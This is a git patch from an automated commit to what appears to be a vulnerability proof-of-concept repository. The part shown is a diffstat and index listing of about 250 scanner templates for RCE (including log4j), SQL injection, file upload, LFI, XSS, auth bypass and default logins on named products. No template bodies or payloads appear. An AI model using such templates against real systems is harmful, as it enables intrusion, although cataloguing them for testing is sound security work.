From ca0d737aefb4f8496289ef2fdcd0efbf687d9866 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Sep 2024 12:38:40 +0000 Subject: [PATCH] 20240912 --- date.txt | 2 +- poc.txt | 184 ++++++++ poc/apache/apache-impala.yaml | 4 +- poc/apache/apache-zeppelin-unauth.yaml | 45 ++ poc/apache/default-apache-shiro.yaml | 29 ++ poc/api/clickhouse-unauth-api.yaml | 6 +- poc/api/discuz-api-pathinfo.yaml | 41 ++ poc/api/graylog-api-exposure.yaml | 91 ++++ poc/api/seafile-api.yaml | 49 ++ poc/atlassian/bamboo-detect.yaml | 35 ++ poc/atlassian/bitbucket-auth-bypass.yaml | 36 ++ poc/auth/BlindSQLAuth.yaml | 6 +- poc/auth/Devias-kit-register.yaml | 25 ++ poc/auth/Mantis-Default_login.yaml | 4 +- poc/auth/apache-zeppelin-unauth.yaml | 45 ++ poc/auth/bitbucket-auth-bypass.yaml | 36 ++ poc/auth/bloofoxcms-default-login.yaml | 42 ++ poc/auth/casdoor-users-password.yaml | 4 +- poc/auth/chatgpt-web-unauth.yaml | 4 +- poc/auth/clickhouse-unauth-api.yaml | 6 +- poc/auth/dataease-default-login.yaml | 45 ++ .../ecology-verifyquicklogin-auth-bypass.yaml | 38 ++ poc/auth/elasticsearch-default-login.yaml | 53 +++ poc/auth/esafenet-cdg-default-login.yaml | 56 +++ poc/auth/feiyuxing-default-login.yaml | 51 +++ poc/auth/fusionauth-admin-setup.yaml | 4 +- poc/auth/grafana-login-check.yaml | 55 +++ poc/auth/grav-register-admin.yaml | 4 +- poc/auth/kylin-default-login.yaml | 55 +++ poc/auth/leostream-default-login.yaml | 53 +++ poc/auth/nacos-default-login.yaml | 58 +++ poc/auth/nodered-default-login.yaml | 51 +++ poc/auth/pyload-default-login.yaml | 46 ++ poc/auth/splunk-default-login.yaml | 69 +++ poc/auth/teslamate-unauth-access.yaml | 41 ++ poc/auth/tongda-meeting-unauth.yaml | 29 ++ poc/auth/unauth-celery-flower.yaml | 8 +- poc/auth/unauth-temporal-web-ui.yaml | 5 +- poc/auth/unauth-ztp-ping.yaml | 46 ++ poc/auth/weaver-userselect-unauth.yaml | 35 ++ poc/auth/xxljob-executor-unauth.yaml | 81 ++++ poc/cisco/cisco-webex-log4j-rce.yaml | 66 +++ poc/config/dompdf-config.yaml | 5 +- poc/config/joomla-config-dist-file.yaml | 56 ++- poc/config/openstack-config.yaml | 41 ++ poc/config/weaver-mysql-config-info-leak.yaml | 30 ++ poc/config/wp-superstorefinder-misconfig.yaml | 33 ++ poc/cve/CVE-2019-25212.yaml | 59 +++ poc/cve/CVE-2023-47115.yaml | 96 ++++ poc/cve/CVE-2024-27199.yaml | 37 ++ poc/cve/CVE-2024-5416.yaml | 59 +++ poc/cve/CVE-2024-6335.yaml | 59 +++ poc/cve/CVE-2024-7626.yaml | 59 +++ poc/cve/CVE-2024-7721.yaml | 59 +++ poc/cve/CVE-2024-7727.yaml | 59 +++ poc/cve/CVE-2024-8045.yaml | 59 +++ poc/cve/CVE-2024-8253.yaml | 59 +++ poc/cve/CVE-2024-8277.yaml | 59 +++ poc/cve/CVE-2024-8440.yaml | 59 +++ ...8522-29b9e24c70ba3cd60461931eec1fd527.yaml | 59 +++ ...8529-e2a9975debb93f28e1a8c207f744d964.yaml | 59 +++ ...8622-0703e404cdba311680d3e36cfe2a24e3.yaml | 59 +++ poc/cve/cve-2018-3714.yaml | 10 +- poc/cve/cve-2020-26876.yaml | 39 +- poc/cve/cve-2021-24276.yaml | 3 +- poc/cve/cve-2022-22963.yaml | 20 +- poc/default/Mantis-Default_login.yaml | 4 +- poc/default/bloofoxcms-default-login.yaml | 42 ++ poc/default/dataease-default-login.yaml | 45 ++ poc/default/default-apache-shiro.yaml | 29 ++ poc/default/elasticsearch-default-login.yaml | 53 +++ poc/default/esafenet-cdg-default-login.yaml | 56 +++ poc/default/feiyuxing-default-login.yaml | 51 +++ poc/default/kylin-default-login.yaml | 55 +++ poc/default/leostream-default-login.yaml | 53 +++ poc/default/nacos-default-login.yaml | 58 +++ poc/default/nodered-default-login.yaml | 51 +++ poc/default/pyload-default-login.yaml | 46 ++ poc/default/splunk-default-login.yaml | 69 +++ poc/detect/4D-detect.yaml | 4 +- poc/detect/bamboo-detect.yaml | 35 ++ poc/detect/burp-collaborator-detect.yaml | 44 ++ poc/detect/casaos-detection.yaml | 31 ++ poc/detect/checkpoint-mobile-detect.yaml | 36 ++ poc/detect/chromecast-detect.yaml | 36 ++ poc/detect/cvsweb-detect.yaml | 45 ++ poc/detect/directus-detect.yaml | 28 ++ poc/detect/element-web-detect.yaml | 36 ++ poc/detect/identity-server-v3-detect.yaml | 38 ++ poc/detect/limesurvey-detect.yaml | 40 ++ poc/detect/matrix-homeserver-detect.yaml | 37 ++ poc/detect/openproject-detect.yaml | 44 ++ poc/detect/phplist-detect.yaml | 42 ++ poc/detect/tibco-businessconnect-detect.yaml | 28 ++ poc/detect/wing-ftp-service-detect.yaml | 25 ++ .../ecology-jqueryfiletree-traversal.yaml | 36 ++ poc/elk/elasticsearch-default-login.yaml | 53 +++ poc/exposed/graylog-api-exposure.yaml | 91 ++++ poc/exposed/rakefile-disclosure.yaml | 40 ++ poc/exposed/request-baskets-exposure.yaml | 4 +- .../sonarqube-projects-disclosure.yaml | 42 ++ poc/exposed/vbulletin-path-disclosure.yaml | 58 +++ poc/exposed/viminfo-disclosure.yaml | 40 ++ poc/exposed/zzzcms-info-disclosure.yaml | 42 ++ poc/ftp/wing-ftp-service-detect.yaml | 25 ++ poc/google/google-secrets.yaml | 16 +- poc/java/default-apache-shiro.yaml | 29 ++ poc/java/tomcat-stacktraces.yaml | 5 +- poc/javascript/custom-css-js-php.yaml | 59 +++ poc/javascript/ojs-installer.yaml | 4 +- poc/joomla/joomla-config-dist-file.yaml | 56 ++- poc/local_file_inclusion/acti-video-lfi.yaml | 39 ++ .../kingsoft-vgm-lfi.yaml | 39 ++ .../sangfor-ngaf-lfi.yaml | 42 ++ .../weaver-officeserver-lfi.yaml | 35 ++ .../weaver-signaturedownload-lfi.yaml | 42 ++ .../weaver-sptmforportalthumbnail-lfi.yaml | 41 ++ .../yonyou-ufida-nc-lfi.yaml | 34 ++ poc/microsoft/74cms-weixin-sqli.yaml | 39 ++ .../Hikvision_iVMS-8700_upload_action.yaml | 40 +- poc/microsoft/bloofoxcms-default-login.yaml | 42 ++ poc/microsoft/ms-exchange-user-enum.yaml | 5 +- poc/microsoft/yzmcms-installer.yaml | 4 +- poc/microsoft/zzzcms-info-disclosure.yaml | 42 ++ poc/mysql/mysql-history.yaml | 54 +++ poc/mysql/weaver-mysql-config-info-leak.yaml | 30 ++ poc/nodejs/nodered-default-login.yaml | 51 +++ poc/oracle/xss-oracle.yaml | 22 + poc/other/12.1.1.2.yaml | 59 +++ poc/other/12.1.1.yaml | 64 +++ poc/other/3867691789.yaml | 68 ++- poc/other/5.1.5.yaml | 141 ++++++ poc/other/5.3.3.1.yaml | 54 +++ poc/other/8.2.1.yaml | 28 ++ poc/other/9.1.2.yaml | 425 ++++++++++++++++++ poc/other/advanced-backgrounds.yaml | 59 +++ poc/other/alma-installer.yaml | 4 +- ...maps-4b370fcafcc0619a561d13639d3f142f.yaml | 59 +++ poc/other/bitrix24-installer.yaml | 4 +- poc/other/booked-export-csv.yaml | 50 +++ poc/other/caldera-c2.yaml | 33 ++ poc/other/chamilo-installer.yaml | 5 +- poc/other/clipbucket-installer.yaml | 4 +- poc/other/codeigniter-errorpage.yaml | 4 +- poc/other/combodo-itop-installer.yaml | 4 +- poc/other/connectwise-setup.yaml | 30 ++ poc/other/discuz-panel.yaml | 39 ++ poc/other/dokuwiki-panel.yaml | 4 +- poc/other/dolphin-installer.yaml | 4 +- poc/other/espocrm-installer.yaml | 29 ++ poc/other/graylog-panel.yaml | 28 ++ poc/other/h2o-dashboard.yaml | 39 ++ poc/other/knowledgetree-installer.yaml | 29 ++ ...ress-5c26a1848cda845d9b97374472d49eb0.yaml | 59 +++ ...ress-fcb8158f71307795525b9840bda82742.yaml | 59 +++ poc/other/magnolia-installer.yaml | 4 +- poc/other/mantisbt-installer.yaml | 4 +- poc/other/mosparo-install.yaml | 4 +- poc/other/orangescrum-install.yaml | 4 +- poc/other/ords-panel.yaml | 18 + poc/other/perfsonar-toolkit.yaml | 4 +- poc/other/posteio-admin-panel.yaml | 4 +- poc/other/sharefile-storage-server.yaml | 32 ++ poc/other/shopware-installer.yaml | 4 +- poc/other/smokeping-grapher.yaml | 4 +- poc/other/softether-vpn-panel.yaml | 4 +- poc/other/spa-cart-installer.yaml | 32 ++ poc/other/sugarcrm-install.yaml | 4 +- poc/other/tautulli-install.yaml | 4 +- poc/other/tongda-video-file-read.yaml | 33 ++ poc/other/untangle-admin-setup.yaml | 4 +- poc/other/wechat-info-leak.yaml | 31 ++ .../yonyou-nc-baseapp-deserialization.yaml | 28 ++ poc/other/yonyou-nc-info-leak.yaml | 35 ++ poc/other/zencart-installer.yaml | 4 +- poc/php/custom-css-js-php.yaml | 59 +++ poc/php/phpgedview-installer.yaml | 32 ++ poc/php/phplist-detect.yaml | 42 ++ poc/php/phpsys-info.yaml | 33 ++ poc/php/thinkphp-errors.yaml | 4 +- .../Hikvision_applyCT_RCE.yaml | 45 +- .../cisco-webex-log4j-rce.yaml | 66 +++ .../citrix-xenapp-log4j-rce.yaml | 66 +++ .../flexnet-log4j-rce.yaml | 65 +++ poc/remote_code_execution/flir-ax8-rce.yaml | 60 +++ .../manage-engine-dc-log4j-rce.yaml | 65 +++ .../openshift-log4j-rce.yaml | 65 +++ .../papercut-log4j-rce.yaml | 65 +++ .../ruijie-nmc-sync-rce.yaml | 40 ++ .../symantec-sepm-log4j-rce.yaml | 67 +++ .../tongda-getdata-rce.yaml | 37 ++ .../weaver-ecology-bshservlet-rce.yaml | 43 ++ .../woocommerce-photo-reviews.yaml | 59 +++ .../wp-social-warfare-rce.yaml | 44 ++ .../yonyou-nc-ncmessageservlet-rce.yaml | 45 ++ poc/search/elasticsearch-default-login.yaml | 53 +++ poc/social/wp-social-warfare-rce.yaml | 44 ++ poc/sql/74cms-weixin-sqli.yaml | 39 ++ ...8622-0703e404cdba311680d3e36cfe2a24e3.yaml | 59 +++ poc/sql/SQLNet-log.yaml | 18 + poc/sql/ecology-oa-file-sqli.yaml | 43 ++ poc/sql/ecology-sqli2.yaml | 6 +- poc/sql/mysql-history.yaml | 54 +++ poc/sql/odoo-unprotected-database.yaml | 32 ++ poc/sql/sql-server-report-viewer.yaml | 4 +- poc/sql/tongda-insert-sqli.yaml | 47 ++ poc/sql/tongda-report-func-sqli.yaml | 39 ++ poc/sql/weaver-checkserver-sqli.yaml | 32 ++ poc/sql/weaver-ecology-getsqldata-sqli.yaml | 40 ++ poc/sql/weaver-ecology-hrmcareer-sqli.yaml | 36 ++ poc/sql/weaver-mysql-config-info-leak.yaml | 30 ++ poc/sql_injection/74cms-weixin-sqli.yaml | 39 ++ poc/sql_injection/SQLNet-log.yaml | 18 + poc/sql_injection/ecology-oa-file-sqli.yaml | 43 ++ poc/sql_injection/ecology-sqli2.yaml | 6 +- poc/sql_injection/mysql-history.yaml | 54 +++ .../sql-server-report-viewer.yaml | 4 +- poc/sql_injection/tongda-insert-sqli.yaml | 47 ++ .../tongda-report-func-sqli.yaml | 39 ++ .../weaver-checkserver-sqli.yaml | 32 ++ .../weaver-ecology-getsqldata-sqli.yaml | 40 ++ .../weaver-ecology-hrmcareer-sqli.yaml | 36 ++ .../weaver-mysql-config-info-leak.yaml | 30 ++ poc/ssrf/office-webapps-ssrf.yaml | 6 +- .../Hikvision_iVMS-8700_upload_action.yaml | 40 +- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 ++- poc/upload/Ruijie_NBR_Router_fileupload.yaml | 30 +- poc/upload/weaver-eoffice-file-upload.yaml | 61 +++ .../weaver-ktreeuploadaction-file-upload.yaml | 57 +++ .../weaver-uploadoperation-file-upload.yaml | 77 ++++ poc/upload/wp-gallery-file-upload.yaml | 48 ++ .../yonyou-nc-dispatcher-fileupload.yaml | 38 ++ .../yonyou-nc-grouptemplet-fileupload.yaml | 52 +-- .../vmware-operation-manager-log4j.yaml | 21 +- poc/web/chatgpt-web-unauth.yaml | 4 +- poc/web/cisco-webex-log4j-rce.yaml | 66 +++ poc/web/cvsweb-detect.yaml | 45 ++ poc/web/element-web-detect.yaml | 36 ++ poc/web/office-webapps-ssrf.yaml | 6 +- poc/web/unauth-temporal-web-ui.yaml | 5 +- poc/web/webcalendar-install.yaml | 4 +- poc/web/webtrees-install.yaml | 4 +- poc/wordpress/wp-gallery-file-upload.yaml | 48 ++ poc/wordpress/wp-real-estate-xss.yaml | 37 ++ poc/wordpress/wp-social-warfare-rce.yaml | 44 ++ .../wp-superstorefinder-misconfig.yaml | 33 ++ poc/xss/beyond-trust-xss.yaml | 31 ++ poc/xss/junos-xss.yaml | 51 +++ poc/xss/photoblocks-grid-gallery-xss.yaml | 35 ++ poc/xss/sitecore-xml-xss.yaml | 39 ++ poc/xss/wp-real-estate-xss.yaml | 37 ++ poc/xss/xss-oracle.yaml | 22 + 252 files changed, 9412 insertions(+), 384 deletions(-) create mode 100644 poc/apache/apache-zeppelin-unauth.yaml create mode 100644 poc/apache/default-apache-shiro.yaml create mode 100644 poc/api/discuz-api-pathinfo.yaml create mode 100644 poc/api/graylog-api-exposure.yaml create mode 100644 poc/api/seafile-api.yaml create mode 100644 poc/atlassian/bamboo-detect.yaml create mode 100644 poc/atlassian/bitbucket-auth-bypass.yaml create mode 100644 poc/auth/Devias-kit-register.yaml create mode 100644 poc/auth/apache-zeppelin-unauth.yaml create mode 100644 poc/auth/bitbucket-auth-bypass.yaml create mode 100644 poc/auth/bloofoxcms-default-login.yaml create mode 100644 poc/auth/dataease-default-login.yaml create mode 100755 poc/auth/ecology-verifyquicklogin-auth-bypass.yaml create mode 100644 poc/auth/elasticsearch-default-login.yaml create mode 100644 poc/auth/esafenet-cdg-default-login.yaml create mode 100644 poc/auth/feiyuxing-default-login.yaml create mode 100644 poc/auth/grafana-login-check.yaml create mode 100644 poc/auth/kylin-default-login.yaml create mode 100644 poc/auth/leostream-default-login.yaml create mode 100644 poc/auth/nacos-default-login.yaml create mode 100644 poc/auth/nodered-default-login.yaml create mode 100644 poc/auth/pyload-default-login.yaml create mode 100644 poc/auth/splunk-default-login.yaml create mode 100644 poc/auth/teslamate-unauth-access.yaml create mode 100755 poc/auth/tongda-meeting-unauth.yaml create mode 100644 poc/auth/unauth-ztp-ping.yaml create mode 100755 poc/auth/weaver-userselect-unauth.yaml create mode 100644 poc/auth/xxljob-executor-unauth.yaml create mode 100644 poc/cisco/cisco-webex-log4j-rce.yaml mode change 100755 => 100644 poc/config/joomla-config-dist-file.yaml create mode 100644 poc/config/openstack-config.yaml create mode 100644 poc/config/weaver-mysql-config-info-leak.yaml create mode 100644 poc/config/wp-superstorefinder-misconfig.yaml create mode 100644 poc/cve/CVE-2019-25212.yaml create mode 100644 poc/cve/CVE-2023-47115.yaml create mode 100644 poc/cve/CVE-2024-27199.yaml create mode 100644 poc/cve/CVE-2024-5416.yaml create mode 100644 poc/cve/CVE-2024-6335.yaml create mode 100644 poc/cve/CVE-2024-7626.yaml create mode 100644 poc/cve/CVE-2024-7721.yaml create mode 100644 poc/cve/CVE-2024-7727.yaml create mode 100644 poc/cve/CVE-2024-8045.yaml create mode 100644 poc/cve/CVE-2024-8253.yaml create mode 100644 poc/cve/CVE-2024-8277.yaml create mode 100644 poc/cve/CVE-2024-8440.yaml create mode 100644 poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml create mode 100644 poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml create mode 100644 poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml create mode 100644 poc/default/bloofoxcms-default-login.yaml create mode 100644 poc/default/dataease-default-login.yaml create mode 100644 poc/default/default-apache-shiro.yaml create mode 100644 poc/default/elasticsearch-default-login.yaml create mode 100644 poc/default/esafenet-cdg-default-login.yaml create mode 100644 poc/default/feiyuxing-default-login.yaml create mode 100644 poc/default/kylin-default-login.yaml create mode 100644 poc/default/leostream-default-login.yaml create mode 100644 poc/default/nacos-default-login.yaml create mode 100644 poc/default/nodered-default-login.yaml create mode 100644 poc/default/pyload-default-login.yaml create mode 100644 poc/default/splunk-default-login.yaml create mode 100644 poc/detect/bamboo-detect.yaml create mode 100644 poc/detect/burp-collaborator-detect.yaml create mode 100644 poc/detect/casaos-detection.yaml create mode 100644 poc/detect/checkpoint-mobile-detect.yaml create mode 100644 poc/detect/chromecast-detect.yaml create mode 100644 poc/detect/cvsweb-detect.yaml create mode 100644 poc/detect/directus-detect.yaml create mode 100644 poc/detect/element-web-detect.yaml create mode 100644 poc/detect/identity-server-v3-detect.yaml create mode 100644 poc/detect/limesurvey-detect.yaml create mode 100644 poc/detect/matrix-homeserver-detect.yaml create mode 100644 poc/detect/openproject-detect.yaml create mode 100644 poc/detect/phplist-detect.yaml create mode 100644 poc/detect/tibco-businessconnect-detect.yaml create mode 100644 poc/detect/wing-ftp-service-detect.yaml create mode 100755 poc/directory_listing/ecology-jqueryfiletree-traversal.yaml create mode 100644 poc/elk/elasticsearch-default-login.yaml create mode 100644 poc/exposed/graylog-api-exposure.yaml create mode 100644 poc/exposed/rakefile-disclosure.yaml create mode 100644 poc/exposed/sonarqube-projects-disclosure.yaml create mode 100644 poc/exposed/vbulletin-path-disclosure.yaml create mode 100644 poc/exposed/viminfo-disclosure.yaml create mode 100644 poc/exposed/zzzcms-info-disclosure.yaml create mode 100644 poc/ftp/wing-ftp-service-detect.yaml create mode 100644 poc/java/default-apache-shiro.yaml create mode 100644 poc/javascript/custom-css-js-php.yaml mode change 100755 => 100644 poc/joomla/joomla-config-dist-file.yaml create mode 100644 poc/local_file_inclusion/acti-video-lfi.yaml create mode 100644 poc/local_file_inclusion/kingsoft-vgm-lfi.yaml create mode 100644 poc/local_file_inclusion/sangfor-ngaf-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-officeserver-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml create mode 100644 poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml create mode 100644 poc/microsoft/74cms-weixin-sqli.yaml create mode 100644 poc/microsoft/bloofoxcms-default-login.yaml create mode 100644 poc/microsoft/zzzcms-info-disclosure.yaml create mode 100644 poc/mysql/mysql-history.yaml create mode 100644 poc/mysql/weaver-mysql-config-info-leak.yaml create mode 100644 poc/nodejs/nodered-default-login.yaml create mode 100644 poc/oracle/xss-oracle.yaml create mode 100644 poc/other/12.1.1.2.yaml create mode 100644 poc/other/12.1.1.yaml create mode 100644 poc/other/5.1.5.yaml create mode 100644 poc/other/5.3.3.1.yaml create mode 100644 poc/other/8.2.1.yaml create mode 100644 poc/other/9.1.2.yaml create mode 100644 poc/other/advanced-backgrounds.yaml create mode 100644 poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml create mode 100644 poc/other/booked-export-csv.yaml create mode 100644 poc/other/caldera-c2.yaml create mode 100644 poc/other/connectwise-setup.yaml create mode 100644 poc/other/discuz-panel.yaml create mode 100644 poc/other/espocrm-installer.yaml create mode 100644 poc/other/graylog-panel.yaml create mode 100644 poc/other/h2o-dashboard.yaml create mode 100644 poc/other/knowledgetree-installer.yaml create mode 100644 poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml create mode 100644 poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml create mode 100644 poc/other/ords-panel.yaml create mode 100644 poc/other/sharefile-storage-server.yaml create mode 100644 poc/other/spa-cart-installer.yaml create mode 100755 poc/other/tongda-video-file-read.yaml create mode 100644 poc/other/wechat-info-leak.yaml create mode 100755 poc/other/yonyou-nc-baseapp-deserialization.yaml create mode 100644 poc/other/yonyou-nc-info-leak.yaml create mode 100644 poc/php/custom-css-js-php.yaml create mode 100644 poc/php/phpgedview-installer.yaml create mode 100644 poc/php/phplist-detect.yaml create mode 100644 poc/php/phpsys-info.yaml create mode 100644 poc/remote_code_execution/cisco-webex-log4j-rce.yaml create mode 100644 poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml create mode 100644 poc/remote_code_execution/flexnet-log4j-rce.yaml create mode 100644 poc/remote_code_execution/flir-ax8-rce.yaml create mode 100644 poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml create mode 100644 poc/remote_code_execution/openshift-log4j-rce.yaml create mode 100644 poc/remote_code_execution/papercut-log4j-rce.yaml create mode 100644 poc/remote_code_execution/ruijie-nmc-sync-rce.yaml create mode 100644 poc/remote_code_execution/symantec-sepm-log4j-rce.yaml create mode 100755 poc/remote_code_execution/tongda-getdata-rce.yaml create mode 100755 poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml create mode 100644 poc/remote_code_execution/woocommerce-photo-reviews.yaml create mode 100644 poc/remote_code_execution/wp-social-warfare-rce.yaml create mode 100644 poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml create mode 100644 poc/search/elasticsearch-default-login.yaml create mode 100644 poc/social/wp-social-warfare-rce.yaml create mode 100644 poc/sql/74cms-weixin-sqli.yaml create mode 100644 poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml create mode 100644 poc/sql/SQLNet-log.yaml create mode 100644 poc/sql/ecology-oa-file-sqli.yaml create mode 100644 poc/sql/mysql-history.yaml create mode 100644 poc/sql/odoo-unprotected-database.yaml create mode 100755 poc/sql/tongda-insert-sqli.yaml create mode 100755 poc/sql/tongda-report-func-sqli.yaml create mode 100644 poc/sql/weaver-checkserver-sqli.yaml create mode 100755 poc/sql/weaver-ecology-getsqldata-sqli.yaml create mode 100755 poc/sql/weaver-ecology-hrmcareer-sqli.yaml create mode 100644 poc/sql/weaver-mysql-config-info-leak.yaml create mode 100644 poc/sql_injection/74cms-weixin-sqli.yaml create mode 100644 poc/sql_injection/SQLNet-log.yaml create mode 100644 poc/sql_injection/ecology-oa-file-sqli.yaml create mode 100644 poc/sql_injection/mysql-history.yaml create mode 100755 poc/sql_injection/tongda-insert-sqli.yaml create mode 100755 poc/sql_injection/tongda-report-func-sqli.yaml create mode 100644 poc/sql_injection/weaver-checkserver-sqli.yaml create mode 100755 poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml create mode 100755 poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml create mode 100644 poc/sql_injection/weaver-mysql-config-info-leak.yaml create mode 100644 poc/upload/weaver-eoffice-file-upload.yaml create mode 100755 poc/upload/weaver-ktreeuploadaction-file-upload.yaml create mode 100755 poc/upload/weaver-uploadoperation-file-upload.yaml create mode 100644 poc/upload/wp-gallery-file-upload.yaml create mode 100755 poc/upload/yonyou-nc-dispatcher-fileupload.yaml mode change 100644 => 100755 poc/upload/yonyou-nc-grouptemplet-fileupload.yaml create mode 100644 poc/web/cisco-webex-log4j-rce.yaml create mode 100644 poc/web/cvsweb-detect.yaml create mode 100644 poc/web/element-web-detect.yaml create mode 100644 poc/wordpress/wp-gallery-file-upload.yaml create mode 100644 poc/wordpress/wp-real-estate-xss.yaml create mode 100644 poc/wordpress/wp-social-warfare-rce.yaml create mode 100644 poc/wordpress/wp-superstorefinder-misconfig.yaml create mode 100644 poc/xss/beyond-trust-xss.yaml create mode 100644 poc/xss/junos-xss.yaml create mode 100644 poc/xss/photoblocks-grid-gallery-xss.yaml create mode 100644 poc/xss/sitecore-xml-xss.yaml create mode 100644 poc/xss/wp-real-estate-xss.yaml create mode 100644 poc/xss/xss-oracle.yaml diff --git a/date.txt b/date.txt index 2abf40291e..8dcf10768e 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240911 +20240912 diff --git a/poc.txt b/poc.txt index f56864bfcc..2eedc14fb3 100644 --- a/poc.txt +++ b/poc.txt @@ -495,6 +495,7 @@ ./poc/apache/apache-wicket.yaml ./poc/apache/apache-workflow.yaml ./poc/apache/apache-zeppelin-detect.yaml +./poc/apache/apache-zeppelin-unauth.yaml ./poc/apache/apache2-ubuntu默认页面.yaml ./poc/apache/apachesolr-ssrf-1.yaml ./poc/apache/apachesolr-ssrf-2.yaml @@ -506,6 +507,7 @@ ./poc/apache/apachestruts-rce.yaml ./poc/apache/askapache-firefox-adsense-f97340f5d88b3c5e1859d992075304c3.yaml ./poc/apache/askapache-firefox-adsense.yaml +./poc/apache/default-apache-shiro.yaml ./poc/apache/default-apache-test-all-6812.yaml ./poc/apache/default-apache-test-all-6813.yaml ./poc/apache/default-apache-test-all-6814.yaml @@ -1033,6 +1035,7 @@ ./poc/api/custom-logapi-log-detect.yaml ./poc/api/databricks-api-token.yaml ./poc/api/discord-api-token.yaml +./poc/api/discuz-api-pathinfo.yaml ./poc/api/docker-api-detection.yaml ./poc/api/docker-api-unauthorized-rce.yaml ./poc/api/docker-api-unauthorized-rce.yml @@ -1137,6 +1140,7 @@ ./poc/api/graylog-api-browser-7847.yaml ./poc/api/graylog-api-browser-7848.yaml ./poc/api/graylog-api-browser.yaml +./poc/api/graylog-api-exposure.yaml ./poc/api/hardcoded-api-keys.yaml ./poc/api/heroku-api-key.yaml ./poc/api/hidden-api-endpoint-discovery.yaml @@ -1297,6 +1301,7 @@ ./poc/api/s3-sensitive-api.yaml ./poc/api/sapido-router-rce.yaml ./poc/api/seacms-v101v11-comment-api-sqli.yaml +./poc/api/seafile-api.yaml ./poc/api/segment-public-api.yaml ./poc/api/sema-api-b9fc11c70eceb7a7923754c656c28f17.yaml ./poc/api/sema-api.yaml @@ -1539,7 +1544,9 @@ ./poc/atlassian/atlassian-token.yaml ./poc/atlassian/bamboo-columns-e2d997f74c42c2c8a5f10e34c8968b13.yaml ./poc/atlassian/bamboo-columns.yaml +./poc/atlassian/bamboo-detect.yaml ./poc/atlassian/bamboocloud-bim.yaml +./poc/atlassian/bitbucket-auth-bypass.yaml ./poc/atlassian/bitbucket-client-id.yaml ./poc/atlassian/bitbucket-client-secret.yaml ./poc/atlassian/bitbucket-pipelines.yaml @@ -1669,6 +1676,7 @@ ./poc/auth/Chinaunicom-Default-Login.yaml ./poc/auth/Cloudify-login.yaml ./poc/auth/Dahua_DSS_resetPassword.yaml +./poc/auth/Devias-kit-register.yaml ./poc/auth/Discuz-WechatPlugins-Unauth.yaml ./poc/auth/Discuz-unauthorized-tools.yaml ./poc/auth/DocCMS-keyword-SQL.yaml @@ -1981,6 +1989,7 @@ ./poc/auth/apache-storm-unauthorized-access.yml ./poc/auth/apache-superset-login-extended.yaml ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml +./poc/auth/apache-zeppelin-unauth.yaml ./poc/auth/apc-login.yaml ./poc/auth/apc-ups-login-381.yaml ./poc/auth/apc-ups-login-382.yaml @@ -2203,6 +2212,7 @@ ./poc/auth/biometric-login-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/biometric-login-for-woocommerce-plugin.yaml ./poc/auth/biometric-login-for-woocommerce.yaml +./poc/auth/bitbucket-auth-bypass.yaml ./poc/auth/bitbucket-client-secret.yaml ./poc/auth/bithighway-default-password.yaml ./poc/auth/bitly-secret-key-742.yaml @@ -2218,6 +2228,7 @@ ./poc/auth/block-wp-login.yaml ./poc/auth/blogintroduction-wordpress-plugin-a64dfdb35a4384acb2d4d68e05f08394.yaml ./poc/auth/blogintroduction-wordpress-plugin.yaml +./poc/auth/bloofoxcms-default-login.yaml ./poc/auth/bloofoxcms-login-panel.yaml ./poc/auth/blossom-recipe-maker-7d7cba846a8d83d7b462e51f147c77d9.yaml ./poc/auth/blossom-recipe-maker.yaml @@ -2616,6 +2627,7 @@ ./poc/auth/datadog-access-token.yaml ./poc/auth/datadog-login-check.yaml ./poc/auth/datadog-login.yaml +./poc/auth/dataease-default-login.yaml ./poc/auth/datahub-metadata-default-login.yaml ./poc/auth/dataiku-default-login.yaml ./poc/auth/datang-ac-default-password-cnvd-2021-04128.yaml @@ -2817,6 +2829,7 @@ ./poc/auth/easypost-api-token.yaml ./poc/auth/easypost-test-token.yaml ./poc/auth/ecology-loginSSO-sql-CNVD-2021-33202.yaml +./poc/auth/ecology-verifyquicklogin-auth-bypass.yaml ./poc/auth/ecommerce-two-factor-authentication-46bf8f18c41520a2827c86f143a0c89f.yaml ./poc/auth/ecommerce-two-factor-authentication-4ee80c1b7102fd5161cfdab0342bcf79.yaml ./poc/auth/ecommerce-two-factor-authentication-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -2827,6 +2840,7 @@ ./poc/auth/edgeos-login.yaml ./poc/auth/efak-login-panel.yaml ./poc/auth/eko-management-console-login.yaml +./poc/auth/elasticsearch-default-login.yaml ./poc/auth/elasticsearch-unauth.yaml ./poc/auth/elasticsearch-unauth.yml ./poc/auth/elasticsearch-unauthorized-access.yaml @@ -2868,6 +2882,7 @@ ./poc/auth/erident-custom-login-and-dashboard-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/erident-custom-login-and-dashboard-plugin.yaml ./poc/auth/erident-custom-login-and-dashboard.yaml +./poc/auth/esafenet-cdg-default-login.yaml ./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/auth/esxi-unauthorized-access.yaml @@ -2956,6 +2971,7 @@ ./poc/auth/feather-login-page-ec9741fc8ed10c11ede5fff4aebdf98d.yaml ./poc/auth/feather-login-page-fe83e7940064847c35acc8aaee4617f0.yaml 